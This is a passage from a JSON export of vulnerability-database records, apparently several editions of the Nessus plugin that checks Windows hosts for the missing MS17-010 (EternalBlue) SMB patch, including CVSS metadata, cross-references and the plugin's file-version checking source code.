Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.", "nessusSeverity": "", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.8"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS: CANVAS", "Metasploit: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption"]}, "lastseen": "2021-08-12T12:17:43", "differentElements": ["exploitableWith", "nessusSeverity"], "edition": 8}, {"bulletin": {"id": "SMB_NT_MS17-010.NASL", "hash": "b9abd8135dbfca43008678d0346e679b", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. 
WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2019-11-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97737", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?d9f569cf", "http://www.nessus.org/u?321523eb", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://www.nessus.org/u?065561d0", "http://www.nessus.org/u?59db5b5b", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/stamparm/EternalRocks/", "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-08-19T12:37:55", "history": [], "viewCount": 2977, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-33895", 
"1337DAY-ID-27752", "1337DAY-ID-27613"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:142603"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96703", "SMNTC-96704", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": 
["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-08-19T12:37:55", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2021-08-19T12:37:55", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97737", "sourceData": "#\n# (C) 
Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. 
(CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of 
patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 
2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", 
min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n \n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\")\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\") ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows 
Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. 
Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.8"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS(CANVAS)", "Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"]}, "lastseen": "2021-08-19T12:37:55", "differentElements": ["vpr"], "edition": 9}, {"bulletin": {"id": "SMB_NT_MS17-010.NASL", "hash": "c3cfbf804787e9c7754f38fc5f836f24", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. 
WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2019-11-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97737", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?d9f569cf", "https://github.com/stamparm/EternalRocks/", "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://www.nessus.org/u?321523eb", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://www.nessus.org/u?59db5b5b", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://www.nessus.org/u?065561d0", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-06T03:05:04", "history": [], "viewCount": 2977, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-27786"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96705", "SMNTC-96703", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-06T03:05:04", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2021-10-06T03:05:04", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97737", "sourceData": "#\n# (C) Tenable Network Security, 
